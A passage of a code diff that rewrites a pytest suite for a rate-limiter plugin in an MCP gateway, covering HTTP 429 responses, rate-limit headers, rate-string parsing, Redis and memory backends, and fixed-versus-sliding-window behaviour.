ALGORITHM_TOKEN_BUCKET, - FixedWindowAlgorithm, - MemoryBackend, - RateLimiterPlugin, - RedisBackend, - RustRateLimiterEngine, - SlidingWindowAlgorithm, - TokenBucketAlgorithm, -) - - -def _clear_plugin(plugin: RateLimiterPlugin) -> None: - """Clear the algorithm store for a plugin instance.""" - backend = plugin._rate_backend - if isinstance(backend, MemoryBackend): - backend._algorithm._store.clear() - +from cpex_rate_limiter.rate_limiter import RateLimiterConfig, RateLimiterPlugin, _parse_rate +from mcpgateway.plugins.framework import GlobalContext, PluginConfig, PluginContext, PromptHookType, PromptPrehookPayload, ToolHookType, ToolPreInvokePayload -@pytest.fixture(autouse=True) -def clear_rate_limit_store(): - """No-op: each test creates its own plugin instance with a fresh store. - Individual tests call _clear_plugin() when sharing a plugin across steps.""" - yield - -def _mk(rate: str, algorithm: str = ALGORITHM_FIXED_WINDOW) -> RateLimiterPlugin: +def make_plugin(config: dict | None = None) -> RateLimiterPlugin: return RateLimiterPlugin( PluginConfig( name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", + kind="cpex_rate_limiter.rate_limiter.RateLimiterPlugin", hooks=[PromptHookType.PROMPT_PRE_FETCH, ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": rate, "algorithm": algorithm}, - ) - ) - - -@pytest.mark.asyncio -async def test_rate_limit_blocks_on_third_call(): - plugin = _mk("2/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = PromptPrehookPayload(prompt_id="p", args={}) - r1 = await plugin.prompt_pre_fetch(payload, ctx) - assert r1.violation is None - r2 = await plugin.prompt_pre_fetch(payload, ctx) - assert r2.violation is None - r3 = await plugin.prompt_pre_fetch(payload, ctx) - assert r3.violation is not None - - -# ============================================================================ -# HTTP 429 Status Code Tests -# ============================================================================ - - -@pytest.mark.asyncio -async def test_prompt_pre_fetch_violation_returns_http_429(): - """Test that rate limit violations return HTTP 429 status code.""" - plugin = _mk("1/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = PromptPrehookPayload(prompt_id="p", args={}) - - # First request succeeds - r1 = await plugin.prompt_pre_fetch(payload, ctx) - assert r1.violation is None - - # Second request should be rate limited - r2 = await plugin.prompt_pre_fetch(payload, ctx) - assert r2.violation is not None - assert r2.violation.http_status_code == 429 - assert r2.violation.code == "RATE_LIMIT" - - -@pytest.mark.asyncio -async def test_prompt_pre_fetch_violation_includes_all_headers(): - """Test that violations include all RFC-compliant rate limit headers.""" - plugin = _mk("2/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = PromptPrehookPayload(prompt_id="p", args={}) - - # Trigger rate limit - await plugin.prompt_pre_fetch(payload, ctx) # 1st - await plugin.prompt_pre_fetch(payload, ctx) # 2nd - result = await plugin.prompt_pre_fetch(payload, ctx) # 3rd - exceeds limit - - assert result.violation is not None - headers = result.violation.http_headers - assert headers is not None - - # Verify all required headers - assert "X-RateLimit-Limit" in headers - assert headers["X-RateLimit-Limit"] == "2" - - assert "X-RateLimit-Remaining" in headers - assert headers["X-RateLimit-Remaining"] == "0" - - assert "X-RateLimit-Reset" in headers - assert int(headers["X-RateLimit-Reset"]) > 0 - - assert "Retry-After" in headers - assert int(headers["Retry-After"]) > 0 - - -@pytest.mark.asyncio -async def test_prompt_pre_fetch_success_includes_headers_without_retry_after(): - """Test that successful requests include headers but not Retry-After.""" - plugin = _mk("10/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = PromptPrehookPayload(prompt_id="p", args={}) - - result = await plugin.prompt_pre_fetch(payload, ctx) - - assert result.violation is None - assert result.http_headers is not None - - headers = result.http_headers - assert "X-RateLimit-Limit" in headers - assert headers["X-RateLimit-Limit"] == "10" - - assert "X-RateLimit-Remaining" in headers - assert headers["X-RateLimit-Remaining"] == "9" # 1 used, 9 remaining - - assert "X-RateLimit-Reset" in headers - assert int(headers["X-RateLimit-Reset"]) > 0 - - assert "Retry-After" not in headers # Should NOT be present on success - - -# ============================================================================ -# tool_pre_invoke Tests -# ============================================================================ - - -@pytest.mark.asyncio -async def test_tool_pre_invoke_violation_returns_http_429(): - """Test that tool_pre_invoke violations return HTTP 429 status code.""" - # First-Party - from mcpgateway.plugins.framework import ToolPreInvokePayload - - plugin = _mk("1/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # First request succeeds - r1 = await plugin.tool_pre_invoke(payload, ctx) - assert r1.violation is None - - # Second request should be rate limited - r2 = await plugin.tool_pre_invoke(payload, ctx) - assert r2.violation is not None - assert r2.violation.http_status_code == 429 - assert r2.violation.code == "RATE_LIMIT" - - -@pytest.mark.asyncio -async def test_tool_pre_invoke_violation_includes_headers(): - """Test that tool_pre_invoke violations include rate limit headers.""" - # First-Party - from mcpgateway.plugins.framework import ToolPreInvokePayload - - plugin = _mk("2/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # Trigger rate limit - await plugin.tool_pre_invoke(payload, ctx) # 1st - await plugin.tool_pre_invoke(payload, ctx) # 2nd - result = await plugin.tool_pre_invoke(payload, ctx) # 3rd - exceeds limit - - assert result.violation is not None - headers = result.violation.http_headers - assert headers is not None - - # Verify headers are present - assert "X-RateLimit-Limit" in headers - assert "X-RateLimit-Remaining" in headers - assert headers["X-RateLimit-Remaining"] == "0" - assert "X-RateLimit-Reset" in headers - assert "Retry-After" in headers - - -@pytest.mark.asyncio -async def test_tool_pre_invoke_success_includes_headers_without_retry_after(): - """Test that successful tool invocations include headers but not Retry-After.""" - # First-Party - from mcpgateway.plugins.framework import ToolPreInvokePayload - - plugin = _mk("10/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - result = await plugin.tool_pre_invoke(payload, ctx) - - assert result.violation is None - assert result.http_headers is not None - - headers = result.http_headers - assert "X-RateLimit-Limit" in headers - assert "X-RateLimit-Remaining" in headers - assert "X-RateLimit-Reset" in headers - assert "Retry-After" not in headers - - -@pytest.mark.asyncio -async def test_tool_pre_invoke_per_tool_rate_limiting(): - """Test per-tool rate limiting configuration.""" - # First-Party - from mcpgateway.plugins.framework import ToolPreInvokePayload - - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "100/s", "by_tool": {"restricted_tool": "1/s"}}, # High user limit # Low tool-specific limit + config=config or {}, ) ) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - restricted_payload = ToolPreInvokePayload(name="restricted_tool", arguments={}) - unrestricted_payload = ToolPreInvokePayload(name="other_tool", arguments={}) - - # First call to restricted tool succeeds - r1 = await plugin.tool_pre_invoke(restricted_payload, ctx) - assert r1.violation is None - - # Second call to same tool should be rate limited - r2 = await plugin.tool_pre_invoke(restricted_payload, ctx) - assert r2.violation is not None - assert r2.violation.http_status_code == 429 - - # But other tool should still work (only user limit applies) - r3 = await plugin.tool_pre_invoke(unrestricted_payload, ctx) - assert r3.violation is None - - -# ============================================================================ -# Helper Function Tests -# ============================================================================ - - -def test_make_headers_with_retry_after(): - """Test header generation with Retry-After.""" - headers = _make_headers(limit=60, remaining=0, reset_timestamp=1737394800, retry_after=35, include_retry_after=True) - - assert headers["X-RateLimit-Limit"] == "60" - assert headers["X-RateLimit-Remaining"] == "0" - assert headers["X-RateLimit-Reset"] == "1737394800" - assert headers["Retry-After"] == "35" - -def test_make_headers_without_retry_after(): - """Test header generation without Retry-After.""" - headers = _make_headers(limit=60, remaining=45, reset_timestamp=1737394800, retry_after=35, include_retry_after=False) - - assert headers["X-RateLimit-Limit"] == "60" - assert headers["X-RateLimit-Remaining"] == "45" - assert headers["X-RateLimit-Reset"] == "1737394800" - assert "Retry-After" not in headers - - -# ============================================================================ -# _select_most_restrictive TESTS -# ============================================================================ - - -class TestSelectMostRestrictive: - """Comprehensive tests for _select_most_restrictive function.""" - - # Test Category 1: Edge Cases & Empty Handling - - def test_empty_list_returns_unlimited(self): - """Empty list should return unlimited result.""" - allowed, limit, remaining, reset_ts, meta = _select_most_restrictive([]) - assert allowed is True - assert limit == 0 - assert remaining == 0 - assert reset_ts == 0 - assert meta == {"limited": False} - - def test_single_unlimited_result(self): - """Single unlimited result (limit=0) should return unlimited.""" - results = [(True, 0, 0, {"limited": False})] - allowed, limit, _remaining, _reset_ts, meta = _select_most_restrictive(results) - assert allowed is True - assert limit == 0 - assert meta["limited"] is False - - def test_all_unlimited_results(self): - """All unlimited results should return unlimited.""" - results = [ - (True, 0, 0, {"limited": False}), - (True, 0, 0, {"limited": False}), - (True, 0, 0, {"limited": False}), - ] - allowed, limit, _remaining, _reset_ts, meta = _select_most_restrictive(results) - assert allowed is True - assert limit == 0 - assert meta["limited"] is False - - # Test Category 2: Single Dimension - - def test_single_violated_dimension(self): - """Single violated dimension should be returned with remaining=0.""" - now = 1000 - results = [(False, 10, now + 60, {"limited": True, "remaining": 0, "reset_in": 60})] - allowed, limit, remaining, reset_ts, meta = _select_most_restrictive(results) - assert allowed is False - assert limit == 10 - assert remaining == 0 - assert reset_ts == now + 60 - assert meta["reset_in"] == 60 - - def test_single_allowed_dimension(self): - """Single allowed dimension should be returned with correct remaining.""" - now = 1000 - results = [(True, 100, now + 60, {"limited": True, "remaining": 95, "reset_in": 60})] - allowed, limit, remaining, reset_ts, _meta = _select_most_restrictive(results) - assert allowed is True - assert limit == 100 - assert remaining == 95 - assert reset_ts == now + 60 - - # Test Category 3: Multiple Violated Dimensions - Select Shortest Reset - - def test_multiple_violated_shortest_reset_wins(self): - """When multiple violated, select the one with shortest reset time.""" - now = 1000 - results = [ - (False, 10, now + 30, {"limited": True, "remaining": 0, "reset_in": 30}), # Resets sooner - (False, 20, now + 60, {"limited": True, "remaining": 0, "reset_in": 60}), - (False, 30, now + 120, {"limited": True, "remaining": 0, "reset_in": 120}), - ] - allowed, limit, remaining, reset_ts, meta = _select_most_restrictive(results) - assert allowed is False - assert limit == 10 # Shortest reset_in (30) - assert remaining == 0 - assert reset_ts == now + 30 - assert meta["reset_in"] == 30 - - def test_violated_with_allowed_dimensions(self): - """When some violated and some allowed, violated takes precedence.""" - now = 1000 - results = [ - (True, 100, now + 60, {"limited": True, "remaining": 90, "reset_in": 60}), # Allowed - (False, 50, now + 30, {"limited": True, "remaining": 0, "reset_in": 30}), # Violated (shortest) - (False, 75, now + 90, {"limited": True, "remaining": 0, "reset_in": 90}), # Violated - ] - allowed, limit, remaining, reset_ts, meta = _select_most_restrictive(results) - assert allowed is False - assert limit == 50 # Violated with shortest reset - assert remaining == 0 - assert reset_ts == now + 30 - assert "dimensions" in meta - assert "violated" in meta["dimensions"] - assert "allowed" in meta["dimensions"] - - def test_multiple_violated_equal_reset_times(self): - """When multiple violated with equal reset times, first one wins (stable).""" - now = 1000 - results = [ - (False, 10, now + 60, {"limited": True, "remaining": 0, "reset_in": 60}), - (False, 20, now + 60, {"limited": True, "remaining": 0, "reset_in": 60}), - ] - allowed, limit, remaining, _reset_ts, meta = _select_most_restrictive(results) - assert allowed is False - assert limit == 10 # First one with shortest reset - assert remaining == 0 - assert meta["reset_in"] == 60 - - # Test Category 4: Multiple Allowed Dimensions - Select Lowest Remaining - - def test_multiple_allowed_lowest_remaining_wins(self): - """When all allowed, select the one with lowest remaining.""" - now = 1000 - results = [ - (True, 100, now + 60, {"limited": True, "remaining": 50, "reset_in": 60}), - (True, 200, now + 60, {"limited": True, "remaining": 10, "reset_in": 60}), # Lowest remaining - (True, 150, now + 60, {"limited": True, "remaining": 75, "reset_in": 60}), - ] - allowed, limit, remaining, reset_ts, _meta = _select_most_restrictive(results) - assert allowed is True - assert limit == 200 # Has lowest remaining (10) - assert remaining == 10 - assert reset_ts == now + 60 - - def test_allowed_with_equal_remaining(self): - """When remaining is equal, first one wins (stable sort).""" - now = 1000 - results = [ - (True, 100, now + 60, {"limited": True, "remaining": 25, "reset_in": 60}), - (True, 200, now + 30, {"limited": True, "remaining": 25, "reset_in": 30}), - ] - allowed, limit, remaining, _reset_ts, _meta = _select_most_restrictive(results) - assert allowed is True - assert remaining == 25 - assert limit == 100 # First one when remaining is equal - - def test_two_allowed_different_remaining(self): - """Two allowed dimensions with different remaining.""" - now = 1000 - results = [ - (True, 100, now + 60, {"limited": True, "remaining": 80, "reset_in": 60}), - (True, 50, now + 60, {"limited": True, "remaining": 40, "reset_in": 60}), # Lower remaining - ] - allowed, limit, remaining, _reset_ts, _meta = _select_most_restrictive(results) - assert allowed is True - assert limit == 50 - assert remaining == 40 - - # Test Category 5: Mixed Limited and Unlimited - - def test_limited_more_restrictive_than_unlimited(self): - """Limited dimension should be selected over unlimited.""" - now = 1000 - results = [ - (True, 0, 0, {"limited": False}), # Unlimited - (True, 100, now + 60, {"limited": True, "remaining": 95, "reset_in": 60}), # Limited - ] - allowed, limit, remaining, _reset_ts, meta = _select_most_restrictive(results) - assert allowed is True - assert limit == 100 # Limited dimension selected - assert remaining == 95 - assert meta["limited"] is True - - def test_violated_limited_with_unlimited(self): - """Violated limited dimension should be selected over unlimited.""" - now = 1000 - results = [ - (True, 0, 0, {"limited": False}), # Unlimited - (False, 50, now + 30, {"limited": True, "remaining": 0, "reset_in": 30}), # Violated - ] - allowed, limit, remaining, _reset_ts, _meta = _select_most_restrictive(results) - assert allowed is False - assert limit == 50 - assert remaining == 0 - - def test_multiple_unlimited_with_one_limited(self): - """Multiple unlimited with one limited should select limited.""" - now = 1000 - results = [ - (True, 0, 0, {"limited": False}), - (True, 0, 0, {"limited": False}), - (True, 75, now + 60, {"limited": True, "remaining": 60, "reset_in": 60}), - (True, 0, 0, {"limited": False}), - ] - allowed, limit, remaining, _reset_ts, _meta = _select_most_restrictive(results) - assert allowed is True - assert limit == 75 - assert remaining == 60 - - # Test Category 6: Realistic Scenarios - - def test_user_tenant_tool_all_allowed(self): - """Realistic scenario: user, tenant, tool all allowed.""" - now = 1000 - results = [ - (True, 100, now + 60, {"limited": True, "remaining": 80, "reset_in": 60}), # User - (True, 1000, now + 60, {"limited": True, "remaining": 950, "reset_in": 60}), # Tenant - (True, 50, now + 60, {"limited": True, "remaining": 40, "reset_in": 60}), # Tool (most restrictive) - ] - allowed, limit, remaining, _reset_ts, _meta = _select_most_restrictive(results) - assert allowed is True - assert limit == 50 # Tool has lowest remaining (40) - assert remaining == 40 - - def test_user_violated_tenant_tool_allowed(self): - """Realistic scenario: user violated, others allowed.""" - now = 1000 - results = [ - (False, 100, now + 30, {"limited": True, "remaining": 0, "reset_in": 30}), # User violated - (True, 1000, now + 60, {"limited": True, "remaining": 950, "reset_in": 60}), # Tenant allowed - (True, 50, now + 60, {"limited": True, "remaining": 40, "reset_in": 60}), # Tool allowed - ] - allowed, limit, remaining, reset_ts, _meta = _select_most_restrictive(results) - assert allowed is False - assert limit == 100 # User's violated limit - assert remaining == 0 - assert reset_ts == now + 30 - - def test_multiple_violated_different_reset_times(self): - """Realistic scenario: multiple violated with different reset times.""" - now = 1000 - results = [ - (False, 100, now + 60, {"limited": True, "remaining": 0, "reset_in": 60}), # User - (False, 1000, now + 10, {"limited": True, "remaining": 0, "reset_in": 10}), # Tenant (soonest) - (False, 50, now + 30, {"limited": True, "remaining": 0, "reset_in": 30}), # Tool - ] - allowed, limit, remaining, reset_ts, meta = _select_most_restrictive(results) - assert allowed is False - assert limit == 1000 # Tenant resets soonest - assert remaining == 0 - assert reset_ts == now + 10 - assert meta["reset_in"] == 10 - - def test_tenant_unlimited_user_tool_limited(self): - """Realistic scenario: tenant unlimited, user and tool have limits.""" - now = 1000 - results = [ - (True, 100, now + 60, {"limited": True, "remaining": 80, "reset_in": 60}), # User - (True, 0, 0, {"limited": False}), # Tenant unlimited - (True, 50, now + 60, {"limited": True, "remaining": 30, "reset_in": 60}), # Tool (most restrictive) - ] - allowed, limit, remaining, _reset_ts, _meta = _select_most_restrictive(results) - assert allowed is True - assert limit == 50 # Tool is most restrictive - assert remaining == 30 - - -# ============================================================================ -# _parse_rate Tests -# ============================================================================ +def make_context(*, request_id: str = "r1", user: str = "u1", tenant_id: str | None = None) -> PluginContext: + return PluginContext(global_context=GlobalContext(request_id=request_id, user=user, tenant_id=tenant_id)) class TestParseRate: - """Tests for _parse_rate helper covering all time units.""" - def test_seconds_short(self): assert _parse_rate("10/s") == (10, 1) - def test_seconds_medium(self): - assert _parse_rate("10/sec") == (10, 1) - - def test_seconds_long(self): - assert _parse_rate("10/second") == (10, 1) - - def test_minutes_short(self): - assert _parse_rate("60/m") == (60, 60) - def test_minutes_medium(self): assert _parse_rate("60/min") == (60, 60) - def test_minutes_long(self): - assert _parse_rate("60/minute") == (60, 60) - - def test_hours_short(self): - assert _parse_rate("100/h") == (100, 3600) - - def test_hours_medium(self): - assert _parse_rate("100/hr") == (100, 3600) - def test_hours_long(self): assert _parse_rate("100/hour") == (100, 3600) - def test_unsupported_unit_raises(self): - with pytest.raises(ValueError, match="unsupported unit"): + def test_invalid_unit_raises(self): + with pytest.raises(ValueError, match='expected "/"'): _parse_rate("10/d") - def test_whitespace_stripped(self): - assert _parse_rate("5/ M ") == (5, 60) - - -# ============================================================================ -# Unlimited (no-limit) path tests -# ============================================================================ - - -def _mk_unlimited() -> RateLimiterPlugin: - """Create a plugin with no rate limits configured.""" - return RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[PromptHookType.PROMPT_PRE_FETCH, ToolHookType.TOOL_PRE_INVOKE], - config={}, # No limits - ) - ) - - -@pytest.mark.asyncio -async def test_prompt_pre_fetch_unlimited_returns_no_headers(): - """When no limits are configured, prompt_pre_fetch returns metadata without http_headers.""" - plugin = _mk_unlimited() - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = PromptPrehookPayload(prompt_id="p", args={}) - - result = await plugin.prompt_pre_fetch(payload, ctx) - assert result.violation is None - assert result.http_headers is None - assert result.metadata is not None - assert result.metadata.get("limited") is False - - -@pytest.mark.asyncio -async def test_tool_pre_invoke_unlimited_returns_no_headers(): - """When no limits are configured, tool_pre_invoke returns metadata without http_headers.""" - # First-Party - from mcpgateway.plugins.framework import ToolPreInvokePayload - - plugin = _mk_unlimited() - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - result = await plugin.tool_pre_invoke(payload, ctx) - assert result.violation is None - assert result.http_headers is None - assert result.metadata is not None - assert result.metadata.get("limited") is False - - -# ============================================================================ -# Known Gap Tests — document current limitations (expected to fail) -# -# Each test is marked xfail(strict=True): -# - While the gap exists → shows as XFAIL (CI passes, bug documented) -# - Once the gap is fixed → shows as XPASS (CI fails, forcing marker removal) -# ============================================================================ - - -@pytest.mark.asyncio -async def test_redis_backend_shares_state_across_instances(): - """ - With the Redis backend, the rate limit counter is shared across all workers. - - Clearing the local _store (simulating a new process) has no effect — - the counter lives in Redis and persists between workers. - - A fake in-process Redis client is injected so the test runs without - a live Redis server. The fake client uses its own dict (separate from _store) - to simulate shared Redis state. - """ - # Standard - import time as _time - - class _FakeRedis: - """In-process Redis stub: simulates INCR + EXPIRE Lua script semantics.""" - - def __init__(self) -> None: - self._data: Dict[str, tuple[int, int]] = {} # key -> (count, expire_at) - - async def eval(self, script: str, numkeys: int, *args: Any) -> list[int]: - key = args[0] - window_seconds = int(args[1]) - now = int(_time.time()) - entry = self._data.get(key) - if entry is None or entry[1] <= now: - self._data[key] = (1, now + window_seconds) - return [1, window_seconds] - count, expire_at = entry - self._data[key] = (count + 1, expire_at) - return [count + 1, max(0, expire_at - now)] + def test_invalid_count_raises(self): + with pytest.raises(ValueError): + _parse_rate("0/s") + + +class TestRateLimiterConfig: + def test_defaults_match_packaged_config(self): + cfg = RateLimiterConfig() + assert cfg.by_user is None + assert cfg.by_tenant is None + assert cfg.by_tool is None + assert cfg.algorithm == "fixed_window" + assert cfg.backend == "memory" + assert cfg.redis_url is None + assert cfg.redis_key_prefix == "rl" + + def test_overrides_are_applied(self): + cfg = RateLimiterConfig(by_user="10/s", backend="redis", redis_url="redis://localhost:6379/0") + assert cfg.by_user == "10/s" + assert cfg.backend == "redis" + assert cfg.redis_url == "redis://localhost:6379/0" + + +class TestRateLimiterPlugin: + @pytest.mark.asyncio + async def test_prompt_pre_fetch_blocks_on_third_call(self): + plugin = make_plugin({"by_user": "2/s"}) + ctx = make_context() + payload = PromptPrehookPayload(prompt_id="p", args={}) + + first = await plugin.prompt_pre_fetch(payload, ctx) + second = await plugin.prompt_pre_fetch(payload, ctx) + third = await plugin.prompt_pre_fetch(payload, ctx) + + assert first.violation is None + assert second.violation is None + assert third.continue_processing is False + assert third.violation is not None + assert third.violation.code == "RATE_LIMIT" + assert third.violation.http_status_code == 429 + assert third.violation.http_headers["Retry-After"] == "1" + + @pytest.mark.asyncio + async def test_prompt_pre_fetch_success_includes_rate_limit_headers(self): + plugin = make_plugin({"by_user": "10/s"}) + ctx = make_context() + payload = PromptPrehookPayload(prompt_id="p", args={}) - fake_redis = _FakeRedis() - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "2/s", "backend": "redis", "redis_url": "redis://localhost:6379/0"}, - ) - ) - plugin._rate_backend._client = fake_redis # inject fake Redis — no live server needed - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - # Worker 1: alice exhausts her limit (2 requests) - r1 = await plugin.tool_pre_invoke(payload, ctx) - r2 = await plugin.tool_pre_invoke(payload, ctx) - assert r1.violation is None - assert r2.violation is None - - # Simulate Worker 2 starting fresh — clearing the local memory store has no effect - # on the Redis counter (the fake Redis client uses its own dict, not the plugin store) - if isinstance(plugin._rate_backend, MemoryBackend): - plugin._rate_backend._algorithm._store.clear() - - # Worker 2 shares the same Redis — alice's counter is still 2, next request is blocked - r3 = await plugin.tool_pre_invoke(payload, ctx) - assert r3.violation is not None, "alice made 3 requests total (limit is 2). With Redis backend, clearing " "local state has no effect — the counter persists in Redis across all workers." - assert r3.violation.http_status_code == 429 - - -@pytest.mark.asyncio -async def test_store_evicts_expired_windows(): - """ - After a rate limit window expires, the background TTL sweep removes its entry from _store. - - MemoryBackend starts a background asyncio task on first use that sweeps expired - windows every 0.5s. Entries for users who never return are evicted automatically, - bounding memory growth to active windows only. - - The Rust engine does not use the Python MemoryBackend store — this test is - exercising the Python fallback path's sweep behaviour. - """ - # First-Party - import plugins.rate_limiter.rate_limiter as _rl_mod - - with patch.object(_rl_mod, "_RUST_AVAILABLE", False): - plugin = _mk("5/s") - store = plugin._rate_backend._algorithm._store - UNIQUE_USERS = 100 - - # Each unique user creates one entry in the algorithm store - for i in range(UNIQUE_USERS): - ctx = PluginContext(global_context=GlobalContext(request_id=f"r{i}", user=f"user_{i}")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - await plugin.tool_pre_invoke(payload, ctx) - - assert len(store) == UNIQUE_USERS # confirm entries were created - - # Wait for all 1-second windows to expire and the sweep to run - await asyncio.sleep(1.1) - - assert len(store) == 0, f"Expected store to be empty after all windows expired, " f"but found {len(store)} stale entries. " - - -@pytest.mark.asyncio -async def test_concurrent_requests_respect_limit(): - """ - 20 concurrent async requests against a limit of 10 — exactly 10 should be allowed. - - This test PASSES under asyncio (single-threaded event loop, no real concurrency). - It documents that the asyncio path is safe. - - NOTE: Under gunicorn threaded workers the dict read-modify-write in allow() - is NOT atomic without the asyncio.Lock. Two threads can both read count=9, - both pass the check, and both increment — allowing more than the configured - limit. That scenario cannot be demonstrated in a single-threaded asyncio test. - """ - plugin = _mk("10/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - results = await asyncio.gather(*[plugin.tool_pre_invoke(payload, ctx) for _ in range(20)]) - - allowed = sum(1 for r in results if r.violation is None) - - assert allowed == 10, ( - f"Expected exactly 10 allowed requests (the limit), got {allowed}. " - f"Under asyncio this should be deterministic. " - f"Under threaded workers this assertion can fail due to dict race conditions." - ) - - -@pytest.mark.asyncio -async def test_fixed_window_allows_boundary_burst(): - """Empirical proof: fixed_window allows 2× the limit at a window boundary. - - A user sends N requests at the end of window W1 and N more at the start of - W2. All 2N succeed because the counter resets at the boundary. - - Example with limit=5/s: - t=1000: requests 1-5 → allowed (window W1, count=5) - t=1001: requests 6-10 → allowed (window W2 resets, count=1..5) - Total = 10 requests in ~1 second against a limit of 5/s. - - This is the expected behavior of the fixed_window algorithm — not a bug, - but a documented trade-off. Use sliding_window or token_bucket to prevent - boundary bursts (see companion test below). - """ - # First-Party - import plugins.rate_limiter.rate_limiter as _rl_mod - - with patch.object(_rl_mod, "_RUST_AVAILABLE", False): - plugin = _mk("5/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - allowed_total = 0 - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - # Window W1: fill the limit exactly - mock_time.time.return_value = 1000 - for _ in range(5): - r = await plugin.tool_pre_invoke(payload, ctx) - if r.violation is None: - allowed_total += 1 - - # Window W2: new window starts — limit resets - mock_time.time.return_value = 1001 - for _ in range(5): - r = await plugin.tool_pre_invoke(payload, ctx) - if r.violation is None: - allowed_total += 1 - - # fixed_window: all 10 allowed (5 in W1 + 5 in W2 = 2× limit in ~1 second) - assert allowed_total == 10, f"Expected fixed_window to allow 2× the limit at boundary, got {allowed_total}/10" - - -@pytest.mark.asyncio -async def test_sliding_window_prevents_boundary_burst(): - """Companion proof: sliding_window prevents the boundary burst that fixed_window allows. - - Same scenario as test_fixed_window_allows_boundary_burst but with - sliding_window. The 5 requests from W1 are still within the sliding window - when W2 starts, so the second batch is blocked. - """ - # First-Party - import plugins.rate_limiter.rate_limiter as _rl_mod - - with patch.object(_rl_mod, "_RUST_AVAILABLE", False): - plugin = RateLimiterPlugin( - PluginConfig( - name="rl-sw", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "5/s", "algorithm": ALGORITHM_SLIDING_WINDOW}, - ) - ) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - allowed_total = 0 - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - # Window W1: fill the limit exactly at t=1000 - mock_time.time.return_value = 1000.0 - for _ in range(5): - r = await plugin.tool_pre_invoke(payload, ctx) - if r.violation is None: - allowed_total += 1 - - # Half a second later: W1 timestamps are still within the 1s sliding window - mock_time.time.return_value = 1000.5 - for _ in range(5): - r = await plugin.tool_pre_invoke(payload, ctx) - if r.violation is None: - allowed_total += 1 - - # sliding_window: only 5 allowed — the W1 timestamps at t=1000 are still - # within the window at t=1000.5, so the second batch is blocked. - assert allowed_total == 5, f"Expected sliding_window to prevent boundary burst, got {allowed_total}/10 allowed" - - -@pytest.mark.asyncio -async def test_prompt_pre_fetch_enforces_by_tool_config(): - """ - by_tool limits are enforced by prompt_pre_fetch using prompt_id as the key. - - When a prompt_id matches a key in by_tool, that rate limit is applied alongside - by_user and by_tenant — the most restrictive wins. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[PromptHookType.PROMPT_PRE_FETCH], - config={ - "by_user": "100/s", # High — will not trigger - "by_tool": {"search": "2/s"}, # Low — should trigger on 3rd call - }, - ) - ) - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = PromptPrehookPayload(prompt_id="search", args={}) - - r1 = await plugin.prompt_pre_fetch(payload, ctx) - r2 = await plugin.prompt_pre_fetch(payload, ctx) - r3 = await plugin.prompt_pre_fetch(payload, ctx) # should be blocked by by_tool - - assert r1.violation is None - assert r2.violation is None - # Expected: blocked because by_tool["search"] = 2/s is exhausted - # Actual: allowed — prompt_pre_fetch never reads by_tool - assert r3.violation is not None, ( - "Expected 3rd prompt_pre_fetch call to be blocked by by_tool limit (2/s). " "prompt_pre_fetch does not check by_tool — tool-level limits only apply " "to tool_pre_invoke." - ) - - -# ============================================================================ -# Edge Case Tests -# -# Tests that PASS document correct behaviour at boundaries. -# Tests marked xfail document gaps in input validation and error handling. -# ============================================================================ - - -@pytest.mark.asyncio -async def test_empty_string_user_falls_back_to_anonymous(): - """ - An empty string user identity is falsy — falls back to 'anonymous'. - All empty-identity requests share one bucket, correctly rate limited together. - """ - plugin = _mk("2/s") - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - r1 = await plugin.tool_pre_invoke(payload, ctx) - r2 = await plugin.tool_pre_invoke(payload, ctx) - r3 = await plugin.tool_pre_invoke(payload, ctx) - - assert r1.violation is None - assert r2.violation is None - assert r3.violation is not None # anonymous bucket exhausted - assert r3.violation.http_status_code == 429 - - -@pytest.mark.asyncio -async def test_none_tenant_skips_by_tenant_check(): - """ - None tenant_id must skip the by_tenant dimension entirely — no shared 'default' bucket. - Multiple users with no tenant ID must not cross-throttle each other. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - 